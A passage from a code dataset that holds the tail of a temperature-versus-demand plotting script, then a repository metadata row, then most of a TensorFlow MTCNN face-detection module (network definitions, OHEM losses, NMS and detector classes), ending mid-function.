for i in range(0,len(dday),24):
print "i2"
demand_day_avg.append(np.mean(dday[i:i+24]))
for i in range(0,len(dnight),24):
print "i3",i
demand_night_avg.append(np.mean(dnight[i:i+24]))
plt.figure()
plt.scatter(day_avg[:len(demand_day_avg)],demand_day_avg,c='g',label='day')
plt.scatter(night_avg[:len(demand_night_avg)],demand_night_avg,c='b',label='night')
plt.legend()
plt.xlabel('temperature')
plt.ylabel('demand')
| [
"[email protected]"
] | |
fa9bb76e3d49340273e92d5342b1d42d76847abc | be0171a5e8d2d81c4b6872d180a7e376ca7ac6f7 | /src/prepare_data/get_faces.py | e0e63248aab01ec17afb9f50b0bd9adff5a162cf | [] | no_license | fitrialif/emotion-and-gender-classification | 09ba7b6bf1d81950970eaad3442485cd051fc661 | 0415b18313c079d9d6769d03179c6b47ac8e495a | refs/heads/master | 2020-03-23T09:02:12.525932 | 2018-05-28T13:33:20 | 2018-05-28T13:33:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,008 | py | import tensorflow as tf
import numpy as np
import os
#from print_ckpt import print_ckpt
from tensorflow.contrib import slim
import sys
from easydict import EasyDict as edict
import argparse
import cv2
import time
config = edict()
config.BATCH_SIZE = 256
config.CLS_OHEM = True
config.CLS_OHEM_RATIO = 0.7
config.BBOX_OHEM = False
config.BBOX_OHEM_RATIO = 0.7
config.EPS = 1e-14
config.LR_EPOCH = [640,1280,25600,51200]
# 5:test relu, 100: generate for MVtensor
config.train_face = 1
config.r_out = 0
config.P_Num = 3000
config.rnet_wide =0
config.o_out =0
config.Debug =0
def py_nms(dets, thresh, mode="Union"):
"""
greedily select boxes with high confidence
keep boxes overlap <= thresh
rule out overlap > thresh
:param dets: [[x1, y1, x2, y2 score]]
:param thresh: retain overlap <= thresh
:return: indexes to keep
"""
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
#order = scores.argsort()
#print("order, ",order)
keep = []
while order.size > 0:
i = order[0]
#print("i",i)
keep.append(i)
xx1 = np.maximum(x1[i], x1[order[1:]])
yy1 = np.maximum(y1[i], y1[order[1:]])
xx2 = np.minimum(x2[i], x2[order[1:]])
yy2 = np.minimum(y2[i], y2[order[1:]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
if mode == "Union":
ovr = inter / (areas[i] + areas[order[1:]] - inter)
elif mode == "Minimum":
ovr = inter / np.minimum(areas[i], areas[order[1:]])
#keep
#print("len over ",len(ovr))
        # keep only the boxes whose overlap with the current box is <= thresh
inds = np.where(ovr <= thresh)[0]
#print("inds ",inds+1)
        # ovr was computed against order[1:], which is one element shorter than
        # order, so add 1 to inds to map back to indices in the original order
order = order[inds+1]
return keep
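# Worked example (sketch): three boxes, IoU threshold 0.5.
#   dets = np.array([[ 0,  0, 10, 10, 0.9],
#                    [ 1,  1, 11, 11, 0.8],   # IoU with the first ~0.70 -> suppressed
#                    [20, 20, 30, 30, 0.7]])  # no overlap -> kept
#   py_nms(dets, 0.5)  ->  [0, 2]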
num_keep_radio = 0.7
#define prelu
test_fg = config.train_face
def prelu(inputs):
#alphas = tf.get_variable("alphas", shape=inputs.get_shape()[-1], dtype=tf.float32, initializer=tf.constant_initializer(0.25))
alphas = 0.25
pos = tf.nn.relu(inputs)
if test_fg == 100 or test_fg==5:
return pos
else:
#neg = alphas * (inputs-abs(inputs))*0.5
neg = 0.25 * (inputs-abs(inputs))*0.5
return pos +neg
def dense_to_one_hot(labels_dense,num_classes):
num_labels = labels_dense.shape[0]
index_offset = np.arange(num_labels)*num_classes
#num_sample*num_classes
labels_one_hot = np.zeros((num_labels,num_classes))
labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1
return labels_one_hot
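# e.g. dense_to_one_hot(np.array([0, 2]), 3) ->
# [[1., 0., 0.],
#  [0., 0., 1.]]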
#cls_prob:batch*2
#label:batch
def cls_ohem(cls_prob, label):
zeros = tf.zeros_like(label)
#label=-1 --> label=0 net_factory
label_filter_invalid = tf.where(tf.less(label,0), zeros, label)
num_cls_prob = tf.size(cls_prob)
cls_prob_reshape = tf.reshape(cls_prob,[num_cls_prob,-1])
label_int = tf.cast(label_filter_invalid,tf.int32)
num_row = tf.to_int32(cls_prob.get_shape()[0])
row = tf.range(num_row)*2
indices_ = row + label_int
label_prob = tf.squeeze(tf.gather(cls_prob_reshape, indices_))
loss = -tf.log(label_prob+1e-10)
zeros = tf.zeros_like(label_prob, dtype=tf.float32)
ones = tf.ones_like(label_prob,dtype=tf.float32)
valid_inds = tf.where(label < zeros,zeros,ones)
num_valid = tf.reduce_sum(valid_inds)
keep_num = tf.cast(num_valid*num_keep_radio,dtype=tf.int32)
#set 0 to invalid sample
loss = loss * valid_inds
loss,_ = tf.nn.top_k(loss, k=keep_num)
return tf.reduce_mean(loss)
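# OHEM note: cls_ohem above keeps only the hardest num_keep_radio (70%) of
# the valid (label 0/1) samples; part/landmark samples (label < 0) are
# zeroed out of the loss via valid_inds before the top_k selection.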
def bbox_ohem_smooth_L1_loss(bbox_pred,bbox_target,label):
sigma = tf.constant(1.0)
threshold = 1.0/(sigma**2)
zeros_index = tf.zeros_like(label, dtype=tf.float32)
valid_inds = tf.where(label!=zeros_index,tf.ones_like(label,dtype=tf.float32),zeros_index)
abs_error = tf.abs(bbox_pred-bbox_target)
loss_smaller = 0.5*((abs_error*sigma)**2)
loss_larger = abs_error-0.5/(sigma**2)
smooth_loss = tf.reduce_sum(tf.where(abs_error<threshold,loss_smaller,loss_larger),axis=1)
keep_num = tf.cast(tf.reduce_sum(valid_inds)*num_keep_radio,dtype=tf.int32)
smooth_loss = smooth_loss*valid_inds
_, k_index = tf.nn.top_k(smooth_loss, k=keep_num)
smooth_loss_picked = tf.gather(smooth_loss, k_index)
return tf.reduce_mean(smooth_loss_picked)
#label=1 or label=-1 then do regression
def bbox_ohem(bbox_pred,bbox_target,label):
zeros_index = tf.zeros_like(label, dtype=tf.float32)
ones_index = tf.ones_like(label,dtype=tf.float32)
valid_inds = tf.where(tf.equal(tf.abs(label), 1),ones_index,zeros_index)
#(batch,)
square_error = tf.square(bbox_pred-bbox_target)
square_error = tf.reduce_sum(square_error,axis=1)
#keep_num scalar
num_valid = tf.reduce_sum(valid_inds)
#keep_num = tf.cast(num_valid*num_keep_radio,dtype=tf.int32)
keep_num = tf.cast(num_valid, dtype=tf.int32)
#keep valid index square_error
square_error = square_error*valid_inds
_, k_index = tf.nn.top_k(square_error, k=keep_num)
square_error = tf.gather(square_error, k_index)
return tf.reduce_mean(square_error)
def landmark_ohem(landmark_pred,landmark_target,label):
#keep label =-2 then do landmark detection
ones = tf.ones_like(label,dtype=tf.float32)
zeros = tf.zeros_like(label,dtype=tf.float32)
valid_inds = tf.where(tf.equal(label,-2),ones,zeros)
square_error = tf.square(landmark_pred-landmark_target)
square_error = tf.reduce_sum(square_error,axis=1)
num_valid = tf.reduce_sum(valid_inds)
#keep_num = tf.cast(num_valid*num_keep_radio,dtype=tf.int32)
keep_num = tf.cast(num_valid, dtype=tf.int32)
square_error = square_error*valid_inds
_, k_index = tf.nn.top_k(square_error, k=keep_num)
square_error = tf.gather(square_error, k_index)
return tf.reduce_mean(square_error)
def cal_accuracy(cls_prob,label):
pred = tf.argmax(cls_prob,axis=1)
label_int = tf.cast(label,tf.int64)
cond = tf.where(tf.greater_equal(label_int,0))
picked = tf.squeeze(cond)
label_picked = tf.gather(label_int,picked)
pred_picked = tf.gather(pred,picked)
accuracy_op = tf.reduce_mean(tf.cast(tf.equal(label_picked,pred_picked),tf.float32))
return accuracy_op
#construct Pnet
#label:batch
def print_shape(net_name, layer_name, tensor):
    print("net {}: layer {} output shape is {}".format(net_name, layer_name, tensor.get_shape()))
def P_Net(inputs,label=None,bbox_target=None,landmark_target=None,training=True):
#define common param
with slim.arg_scope([slim.conv2d],
activation_fn=prelu,
weights_initializer=slim.xavier_initializer(),
biases_initializer=tf.zeros_initializer(),
weights_regularizer=slim.l2_regularizer(0.0005),
padding='valid'):
#print ("Pnet input shape",inputs.get_shape())
#net = slim.conv2d(inputs, 10, 3, stride=1,scope='conv1')
net = slim.conv2d(inputs, 8, 3, stride=1,scope='conv1')
#print ("conv1 shape ",net.get_shape())
net = slim.max_pool2d(net, kernel_size=[2,2], stride=2, scope='pool1', padding='SAME')
#print ("pool1 shape ",net.get_shape())
net = slim.conv2d(net,num_outputs=16,kernel_size=[3,3],stride=1,scope='conv2')
#print ("conv2 shape ",net.get_shape())
net = slim.conv2d(net,num_outputs=32,kernel_size=[3,3],stride=1,scope='conv3')
#print ("conv3 shape ",net.get_shape())
#batch*H*W*2
conv4_1 = slim.conv2d(net,num_outputs=2,kernel_size=[1,1],stride=1,scope='conv4_1',activation_fn=tf.nn.softmax)
#conv4_1 = slim.conv2d(net,num_outputs=1,kernel_size=[1,1],stride=1,scope='conv4_1',activation_fn=tf.nn.sigmoid)
#print ("cls shape ",conv4_1.get_shape())
#batch*H*W*4
bbox_pred = slim.conv2d(net,num_outputs=4,kernel_size=[1,1],stride=1,scope='conv4_2',activation_fn=None)
#print ("bbox shape ",bbox_pred.get_shape())
#batch*H*W*10
if test_fg:
landmark_pred = slim.conv2d(net,num_outputs=10,kernel_size=[1,1],stride=1,scope='conv4_3',activation_fn=None)
#print ("landmark shape ",landmark_pred.get_shape())
#cls_prob_original = conv4_1
#bbox_pred_original = bbox_pred
if training:
#batch*2
cls_prob = tf.squeeze(conv4_1,[1,2],name='cls_prob')
cls_loss = cls_ohem(cls_prob,label)
#batch
bbox_pred = tf.squeeze(bbox_pred,[1,2],name='bbox_pred')
bbox_loss = bbox_ohem(bbox_pred,bbox_target,label)
#batch*10
if test_fg:
landmark_pred = tf.squeeze(landmark_pred,[1,2],name="landmark_pred")
landmark_loss = landmark_ohem(landmark_pred,landmark_target,label)
else:
landmark_loss = 0
accuracy = cal_accuracy(cls_prob,label)
#L2_loss = tf.add_n(slim.losses.get_regularization_losses())
L2_loss = tf.add_n(tf.losses.get_regularization_losses())
return cls_loss,bbox_loss,landmark_loss,L2_loss,accuracy
#test
else:
#when test,batch_size = 1
cls_pro_test = tf.squeeze(conv4_1, axis=0)
bbox_pred_test = tf.squeeze(bbox_pred,axis=0)
if test_fg:
landmark_pred_test = tf.squeeze(landmark_pred,axis=0)
return cls_pro_test,bbox_pred_test,landmark_pred_test
else:
return cls_pro_test,bbox_pred_test
def R_Net(inputs,label=None,bbox_target=None,landmark_target=None,training=True):
with slim.arg_scope([slim.conv2d],
activation_fn = prelu,
weights_initializer=slim.xavier_initializer(),
biases_initializer=tf.zeros_initializer(),
weights_regularizer=slim.l2_regularizer(0.0005),
padding='valid'):
#print_shape('RNet','input',inputs)
#net = slim.conv2d(inputs, num_outputs=28, kernel_size=[3,3], stride=1, scope="conv1")
net = slim.conv2d(inputs, num_outputs=16, kernel_size=[3,3], stride=1, scope="conv1")
print_shape('RNet','conv1',net)
net = slim.max_pool2d(net, kernel_size=[3, 3], stride=2, scope="pool1", padding='SAME')
print_shape('RNet','pool1',net)
#net = slim.conv2d(net,num_outputs=48,kernel_size=[3,3],stride=1,scope="conv2")
net = slim.conv2d(net,num_outputs=32,kernel_size=[3,3],stride=1,scope="conv2")
print_shape('RNet','conv2',net)
if config.rnet_wide:
net = slim.max_pool2d(net,kernel_size=[3,3],stride=2,scope="pool2",padding='SAME')
else:
net = slim.max_pool2d(net,kernel_size=[3,3],stride=2,scope="pool2")
print_shape('RNet','pool2',net)
if config.rnet_wide:
net = slim.conv2d(net,num_outputs=64,kernel_size=[3,3],stride=1,scope="conv3")
print_shape('RNet','conv3',net)
net = slim.conv2d(net,num_outputs=128,kernel_size=[3,3],stride=1,scope="conv4")
print_shape('RNet','conv4',net)
else:
net = slim.conv2d(net,num_outputs=64,kernel_size=[2,2],stride=1,scope="conv3")
print_shape('RNet','conv3',net)
fc_flatten = slim.flatten(net)
print_shape('RNet','flatten',fc_flatten)
        # both branches of the original rnet_wide check built the same
        # 128-unit layer, so the flag does not affect fc1
        fc1 = slim.fully_connected(fc_flatten, num_outputs=128, scope="fc1", activation_fn=prelu)
print_shape('RNet','fc1',fc1)
#batch*2
cls_prob = slim.fully_connected(fc1,num_outputs=2,scope="cls_fc",activation_fn=tf.nn.softmax)
print_shape('RNet','cls_fc',cls_prob)
#batch*4
bbox_pred = slim.fully_connected(fc1,num_outputs=4,scope="bbox_fc",activation_fn=None)
print_shape('RNet','bbox_fc',bbox_pred)
#batch*10
if test_fg :
landmark_pred = slim.fully_connected(fc1,num_outputs=10,scope="landmark_fc",activation_fn=None)
print_shape('RNet','landmark_fc',landmark_pred)
#train
if training:
cls_loss = cls_ohem(cls_prob,label)
bbox_loss = bbox_ohem(bbox_pred,bbox_target,label)
accuracy = cal_accuracy(cls_prob,label)
if test_fg :
landmark_loss = landmark_ohem(landmark_pred,landmark_target,label)
else:
landmark_loss = 0
#landmark_loss = 0
#L2_loss = tf.add_n(slim.losses.get_regularization_losses())
L2_loss = tf.add_n(tf.losses.get_regularization_losses())
return cls_loss,bbox_loss,landmark_loss,L2_loss,accuracy
else:
if test_fg:
return cls_prob,bbox_pred,landmark_pred
else:
return cls_prob,bbox_pred
#return cls_prob,bbox_pred
def O_Net(inputs,label=None,bbox_target=None,landmark_target=None,training=True):
with slim.arg_scope([slim.conv2d],
activation_fn = prelu,
weights_initializer=slim.xavier_initializer(),
biases_initializer=tf.zeros_initializer(),
weights_regularizer=slim.l2_regularizer(0.0005),
padding='valid'):
#print_shape('ONet','input',inputs)
net = slim.conv2d(inputs, num_outputs=32, kernel_size=[3,3], stride=1, scope="conv1")
print_shape('ONet','conv1',net)
net = slim.max_pool2d(net, kernel_size=[3, 3], stride=2, scope="pool1", padding='SAME')
print_shape('ONet','pool1',net)
net = slim.conv2d(net,num_outputs=64,kernel_size=[3,3],stride=1,scope="conv2")
print_shape('ONet','conv2',net)
net = slim.max_pool2d(net, kernel_size=[3, 3], stride=2, scope="pool2")
print_shape('ONet','pool2',net)
net = slim.conv2d(net,num_outputs=64,kernel_size=[3,3],stride=1,scope="conv3")
print_shape('ONet','conv3',net)
net = slim.max_pool2d(net, kernel_size=[2, 2], stride=2, scope="pool3", padding='SAME')
print_shape('ONet','pool3',net)
net = slim.conv2d(net,num_outputs=128,kernel_size=[2,2],stride=1,scope="conv4")
print_shape('ONet','conv4',net)
fc_flatten = slim.flatten(net)
print_shape('ONet','flatten',fc_flatten)
fc1 = slim.fully_connected(fc_flatten, num_outputs=256,scope="fc1", activation_fn=prelu)
        print_shape('ONet','fc1',fc1)
#batch*2
cls_prob = slim.fully_connected(fc1,num_outputs=2,scope="cls_fc",activation_fn=tf.nn.softmax)
print_shape('ONet','cls_fc',cls_prob)
#batch*4
bbox_pred = slim.fully_connected(fc1,num_outputs=4,scope="bbox_fc",activation_fn=None)
print_shape('ONet','bbox_fc',bbox_pred)
#batch*10
if test_fg:
landmark_pred = slim.fully_connected(fc1,num_outputs=10,scope="landmark_fc",activation_fn=None)
            print_shape('ONet','landmark_fc',landmark_pred)
#train
if training:
cls_loss = cls_ohem(cls_prob,label)
bbox_loss = bbox_ohem(bbox_pred,bbox_target,label)
accuracy = cal_accuracy(cls_prob,label)
if test_fg:
landmark_loss = landmark_ohem(landmark_pred, landmark_target,label)
else:
landmark_loss = 0
#landmark_loss = 0
#L2_loss = tf.add_n(slim.losses.get_regularization_losses())
L2_loss = tf.add_n(tf.losses.get_regularization_losses())
return cls_loss,bbox_loss,landmark_loss,L2_loss,accuracy
else:
if test_fg:
return cls_prob,bbox_pred,landmark_pred
else:
return cls_prob,bbox_pred
class FcnDetector(object):
#net_factory: which net
    #model_path: where the params file is
def __init__(self, net_factory, model_path):
#create a graph
graph = tf.Graph()
self.train_face = config.train_face
with graph.as_default():
#define tensor and op in graph(-1,1)
self.image_op = tf.placeholder(tf.float32, name='input_image')
self.width_op = tf.placeholder(tf.int32, name='image_width')
self.height_op = tf.placeholder(tf.int32, name='image_height')
image_reshape = tf.reshape(self.image_op, [1, self.height_op, self.width_op, 3])
#self.cls_prob batch*2
#self.bbox_pred batch*4
#construct model here
#self.cls_prob, self.bbox_pred = net_factory(image_reshape, training=False)
#contains landmark
if self.train_face:
self.cls_prob, self.bbox_pred, _ = net_factory(image_reshape, training=False)
else:
self.cls_prob, self.bbox_pred = net_factory(image_reshape, training=False)
#allow
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, gpu_options=tf.GPUOptions(allow_growth=True)))
saver = tf.train.Saver()
#check whether the dictionary is valid
net_name = model_path.split('/')[-1]
print("net name is ",net_name)
if self.train_face==100:
logs_dir = "../logs/%s" %(net_name)
summary_op = tf.summary.merge_all()
if os.path.exists(logs_dir) == False:
os.mkdir(logs_dir)
writer = tf.summary.FileWriter(logs_dir,self.sess.graph)
model_dict = '/'.join(model_path.split('/')[:-1])
ckpt = tf.train.get_checkpoint_state(model_dict)
print("restore model path",model_path)
readstate = ckpt and ckpt.model_checkpoint_path
assert readstate, "the params dictionary is not valid"
print ("restore models' param")
saver.restore(self.sess, model_path)
if self.train_face==100:
saver.save(self.sess,model_dict+'/resaved/'+net_name+'relu')
'''
logs_dir = "../logs/%s" %(net_factory)
summary_op = tf.summary.merge_all()
if os.path.exists(logs_dir) == False:
os.mkdir(logs_dir)
writer = tf.summary.FileWriter(logs_dir,self.sess.graph)
#summary = self.sess.run()
#writer.add_summary(summary,global_step=step)
'''
def predict(self, databatch):
height, width, _ = databatch.shape
# print(height, width)
cls_prob, bbox_pred = self.sess.run([self.cls_prob, self.bbox_pred],
feed_dict={self.image_op: databatch, self.width_op: width,
self.height_op: height})
return cls_prob, bbox_pred
class Detector(object):
#net_factory:rnet or onet
#datasize:24 or 48
def __init__(self, net_factory, data_size, batch_size, model_path):
graph = tf.Graph()
self.test_fg = 1
with graph.as_default():
self.image_op = tf.placeholder(tf.float32, shape=[batch_size, data_size, data_size, 3], name='input')
#figure out landmark
if self.test_fg:
self.cls_prob, self.bbox_pred, self.landmark_pred = net_factory(self.image_op, training=False)
#self.landmark_pred = tf.identity(self.landmark_pred,name='output')
else:
self.cls_prob, self.bbox_pred = net_factory(self.image_op, training=False)
#self.cls_prob = tf.identity(self.cls_prob,name='cls_out')
#self.bbox_pred = tf.identity(self.bbox_pred,name='bbox_out')
#self.landmark_pred = tf.identity(self.landmark_pred,name='out')
#self.output_op = tf.concat([self.cls_prob, self.bbox_pred], 1)
#self.net_out = slim.flatten(self.output_op,scope='flatten_1')
#self.out_put = tf.identity(self.net_out,name='output')
self.sess = tf.Session(
config=tf.ConfigProto(allow_soft_placement=True, gpu_options=tf.GPUOptions(allow_growth=True)))
net_name = model_path.split('/')[-1]
print("net name is ",net_name)
saver = tf.train.Saver()
#check whether the dictionary is valid
model_dict = '/'.join(model_path.split('/')[:-1])
ckpt = tf.train.get_checkpoint_state(model_dict)
print ("model_dict is ",model_dict)
readstate = ckpt and ckpt.model_checkpoint_path
#assert readstate, "the params dictionary is not valid"
print ("restore models' param")
saver.restore(self.sess, model_path)
if self.test_fg==100:
saver.save(self.sess,model_dict+'/resaved/'+net_name+'relu')
#print_ckpt('./checkpoint')
self.data_size = data_size
self.batch_size = batch_size
#rnet and onet minibatch(test)
def predict(self, databatch):
# access data
# databatch: N x 3 x data_size x data_size
scores = []
batch_size = self.batch_size
minibatch = []
cur = 0
#num of all_data
n = databatch.shape[0]
while cur < n:
#split mini-batch
minibatch.append(databatch[cur:min(cur + batch_size, n), :, :, :])
cur += batch_size
#every batch prediction result
cls_prob_list = []
bbox_pred_list = []
landmark_pred_list = []
for idx, data in enumerate(minibatch):
m = data.shape[0]
real_size = self.batch_size
#the last batch
if m < batch_size:
keep_inds = np.arange(m)
#gap (difference)
gap = self.batch_size - m
while gap >= len(keep_inds):
gap -= len(keep_inds)
keep_inds = np.concatenate((keep_inds, keep_inds))
if gap != 0:
keep_inds = np.concatenate((keep_inds, keep_inds[:gap]))
data = data[keep_inds]
real_size = m
#cls_prob batch*2
#bbox_pred batch*4
if self.test_fg:
cls_prob, bbox_pred,landmark_pred = self.sess.run([self.cls_prob, self.bbox_pred,self.landmark_pred], feed_dict={self.image_op: data})
#num_batch * batch_size*10
landmark_pred_list.append(landmark_pred[:real_size])
else:
cls_prob, bbox_pred = self.sess.run([self.cls_prob, self.bbox_pred], feed_dict={self.image_op: data})
#num_batch * batch_size *2
cls_prob_list.append(cls_prob[:real_size])
#num_batch * batch_size *4
bbox_pred_list.append(bbox_pred[:real_size])
#num_of_data*2,num_of_data*4,num_of_data*10
if config.Debug:
print("detect shape cls box landmark : ",np.shape(cls_prob_list),np.shape(bbox_pred_list),np.shape(landmark_pred_list))
if self.test_fg:
return np.concatenate(cls_prob_list, axis=0), np.concatenate(bbox_pred_list, axis=0), np.concatenate(landmark_pred_list, axis=0)
else:
return np.concatenate(cls_prob_list, axis=0), np.concatenate(bbox_pred_list, axis=0)
class MtcnnDetector(object):
def __init__(self,
detectors,
min_face_size=24,
stride=2,
threshold=[0.6, 0.6, 0.9],
scale_factor=0.79
):
self.pnet_detector = detectors[0]
self.rnet_detector = detectors[1]
self.onet_detector = detectors[2]
self.min_face_size = min_face_size
self.stride = stride
self.thresh = threshold
self.train_face = config.train_face
if self.train_face:
self.nms_thresh = [0.4,0.4,0.4]
else:
self.nms_thresh = [0.5,0.6,0.6]
self.scale_factor = scale_factor
self.r_out = config.r_out
def convert_to_square(self, bbox):
"""
convert bbox to square
Parameters:
----------
bbox: numpy array , shape n x 5
input bbox
Returns:
-------
square bbox
"""
square_bbox = bbox.copy()
h = bbox[:, 3] - bbox[:, 1] + 1
w = bbox[:, 2] - bbox[:, 0] + 1
max_side = np.maximum(h, w)
square_bbox[:, 0] = bbox[:, 0] + w * 0.5 - max_side * 0.5
square_bbox[:, 1] = bbox[:, 1] + h * 0.5 - max_side * 0.5
square_bbox[:, 2] = square_bbox[:, 0] + max_side - 1
square_bbox[:, 3] = square_bbox[:, 1] + max_side - 1
return square_bbox
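    # Worked example (sketch): bbox [0, 0, 9, 19] has w=10, h=20, so
    # max_side=20 and the square becomes [-5, 0, 14, 19], i.e. the short
    # side is widened symmetrically around the original centre.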
def convert_to_rect(self, bbox):
"""
convert bbox to square
Parameters:
----------
bbox: numpy array , shape n x 5
input bbox
Returns:
-------
square bbox
"""
rect_bbox = bbox.copy()
h = bbox[:, 3] - bbox[:, 1] + 1
w = bbox[:, 2] - bbox[:, 0] + 1
h_n = np.maximum(np.maximum(h, w),2)
w_n = h_n/2
rect_bbox[:, 0] = bbox[:, 0] + w * 0.5 - w_n * 0.5
rect_bbox[:, 1] = bbox[:, 1] + h * 0.5 - h_n * 0.5
rect_bbox[:, 2] = rect_bbox[:, 0] + w_n - 1
rect_bbox[:, 3] = rect_bbox[:, 1] + h_n - 1
return rect_bbox
def calibrate_box(self, bbox, reg,height,width):
"""
calibrate bboxes
Parameters:
----------
bbox: numpy array, shape n x 5
input bboxes
reg: numpy array, shape n x 4
bboxes adjustment
Returns:
-------
bboxes after refinement
"""
if config.Debug:
print("shape ",height,width)
bbox_c = bbox.copy()
w = bbox[:, 2] - bbox[:, 0] + 1
w = np.expand_dims(w, 1)
h = bbox[:, 3] - bbox[:, 1] + 1
h = np.expand_dims(h, 1)
reg_m = np.hstack([w, h, w, h])
aug = reg_m * reg
bbox_c[:, 0:4] = bbox_c[:, 0:4] + aug
if config.Debug:
print("x1 ",bbox_c[:,0])
print("y1 ",bbox_c[:,1])
print("x2 ",bbox_c[:,2])
print("y2 ",bbox_c[:,3])
keep = np.where(bbox_c[:,0] >0)
bbox_c = bbox_c[keep]
keep = np.where(bbox_c[:,1] >0)
bbox_c = bbox_c[keep]
keep = np.where(bbox_c[:,2] <width)
bbox_c = bbox_c[keep]
keep = np.where(bbox_c[:,3] <height)
bbox_c = bbox_c[keep]
keep = np.where(bbox_c[:,2] > bbox_c[:,0])
bbox_c = bbox_c[keep]
keep = np.where(bbox_c[:,3] > bbox_c[:,1])
bbox_c = bbox_c[keep]
return bbox_c
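    # Example: a box [0, 0, 99, 99] (w=h=100) with reg [0.1, 0.1, -0.1, -0.1]
    # becomes [10, 10, 89, 89]; the offsets are fractions of the box size,
    # and boxes pushed outside the image are dropped by the filters above.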
def generate_bbox(self, cls_map, reg, scale, threshold):
"""
generate bbox from feature cls_map
Parameters:
----------
cls_map: numpy array , n x m
detect score for each position
reg: numpy array , n x m x 4
bbox
scale: float number
scale of this detection
threshold: float number
detect threshold
Returns:
-------
bbox array
"""
stride = 2
#stride = 4
cellsize = 12
#cellsize = 25
t_index = np.where(cls_map > threshold)
# find nothing
if t_index[0].size == 0:
return np.array([])
#offset
dx1, dy1, dx2, dy2 = [reg[t_index[0], t_index[1], i] for i in range(4)]
reg = np.array([dx1, dy1, dx2, dy2])
score = cls_map[t_index[0], t_index[1]]
boundingbox = np.vstack([np.round((stride * t_index[1]) / scale),
np.round((stride * t_index[0]) / scale),
np.round((stride * t_index[1] + cellsize) / scale),
np.round((stride * t_index[0] + cellsize) / scale),
score,
reg])
return boundingbox.T
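    # Mapping sketch: with stride 2 and cellsize 12, a hit at feature-map
    # position (row=3, col=4) under scale 0.5 maps back to the image box
    # x1=round(2*4/0.5)=16, y1=round(2*3/0.5)=12,
    # x2=round((2*4+12)/0.5)=40, y2=round((2*3+12)/0.5)=36.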
#pre-process images
def processed_image(self, img, scale):
height, width, channels = img.shape
new_height = int(height * scale) # resized new height
new_width = int(width * scale) # resized new width
new_dim = (new_width, new_height)
img_resized = cv2.resize(img, new_dim, interpolation=cv2.INTER_LINEAR) # resized image
img_resized = (img_resized - 127.5) / 128
return img_resized
def pad(self, bboxes, w, h):
"""
        pad the bboxes, and also restrict their size
Parameters:
----------
bboxes: numpy array, n x 5
input bboxes
w: float number
width of the input image
h: float number
height of the input image
Returns :
------
dy, dx : numpy array, n x 1
start point of the bbox in target image
edy, edx : numpy array, n x 1
end point of the bbox in target image
y, x : numpy array, n x 1
start point of the bbox in original image
        ex, ey : numpy array, n x 1
end point of the bbox in original image
tmph, tmpw: numpy array, n x 1
height and width of the bbox
"""
keep = np.where(bboxes[:,0]< w)
bboxes = bboxes[keep]
keep = np.where(bboxes[:,1]< h)
bboxes = bboxes[keep]
keep = np.where(bboxes[:,2] >0)
bboxes = bboxes[keep]
keep = np.where(bboxes[:,3] >0)
bboxes = bboxes[keep]
keep = np.where(bboxes[:,2] > bboxes[:,0])
bboxes = bboxes[keep]
keep = np.where(bboxes[:,3] > bboxes[:,1])
bboxes = bboxes[keep]
tmpw, tmph = bboxes[:, 2] - bboxes[:, 0] + 1, bboxes[:, 3] - bboxes[:, 1] + 1
num_box = bboxes.shape[0]
dx, dy = np.zeros((num_box,)), np.zeros((num_box,))
edx, edy = tmpw.copy() - 1, tmph.copy() - 1
x, y, ex, ey = bboxes[:, 0], bboxes[:, 1], bboxes[:, 2], bboxes[:, 3]
tmp_index = np.where(ex > w - 1)
edx[tmp_index] = tmpw[tmp_index] + w - 2 - ex[tmp_index]
ex[tmp_index] = w - 1
tmp_index = np.where(ey > h - 1)
edy[tmp_index] = tmph[tmp_index] + h - 2 - ey[tmp_index]
ey[tmp_index] = h - 1
tmp_index = np.where(x < 0)
dx[tmp_index] = 0 - x[tmp_index]
x[tmp_index] = 0
tmp_index = np.where(y < 0)
dy[tmp_index] = 0 - y[tmp_index]
y[tmp_index] = 0
return_list = [dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph]
return_list = [item.astype(np.int32) for item in return_list]
return return_list
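    # Worked example (assumed values): for an image of width w=100, a box with
    # x=90, ex=109 (tmpw=20) is clipped to ex=99 and edx=9, so the crop target
    # columns [0:10] are filled from the source columns [90:100].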
def detect_pnet(self, im):
"""Get face candidates through pnet
Parameters:
----------
im: numpy array
input image array
Returns:
-------
boxes: numpy array
detected boxes before calibration
boxes_c: numpy array
boxes after calibration
"""
h, w, c = im.shape
net_size = 12
current_scale = float(net_size) / self.min_face_size # find initial scale
# print("current_scale", net_size, self.min_face_size, current_scale)
im_resized = self.processed_image(im, current_scale)
current_height, current_width, _ = im_resized.shape
# fcn
all_boxes = list()
while min(current_height, current_width) > net_size:
#return the result predicted by pnet
#cls_cls_map : H*w*2
#reg: H*w*4
cls_cls_map, reg = self.pnet_detector.predict(im_resized)
#boxes: num*9(x1,y1,x2,y2,score,x1_offset,y1_offset,x2_offset,y2_offset)
#print("in MtCnnDetector pnet out shape ",cls_cls_map.shape, reg.shape)
#cls_map = cls_cls_map[:,:,1]
#print("scale, threshold ",current_scale,self.thresh[0])
#boxes = self.generate_bbox(cls_map,reg,current_scale,self.thresh[0])
boxes = self.generate_bbox(cls_cls_map[:,:,1], reg, current_scale, self.thresh[0])
current_scale *= self.scale_factor
im_resized = self.processed_image(im, current_scale)
current_height, current_width, _ = im_resized.shape
if boxes.size == 0:
continue
keep = py_nms(boxes[:, :5], self.nms_thresh[0])
boxes = boxes[keep]
all_boxes.append(boxes)
if len(all_boxes) == 0:
return None, None
all_boxes = np.vstack(all_boxes)
# merge the detection from first stage
keep = py_nms(all_boxes[:, 0:5], self.nms_thresh[0])
all_boxes = all_boxes[keep]
bbw = all_boxes[:, 2] - all_boxes[:, 0] + 1
bbh = all_boxes[:, 3] - all_boxes[:, 1] + 1
# refine the boxes
#print('pnet box ',np.shape(all_boxes))
boxes_c = np.vstack([all_boxes[:, 0] + all_boxes[:, 5] * bbw,
all_boxes[:, 1] + all_boxes[:, 6] * bbh,
all_boxes[:, 2] + all_boxes[:, 7] * bbw,
all_boxes[:, 3] + all_boxes[:, 8] * bbh,
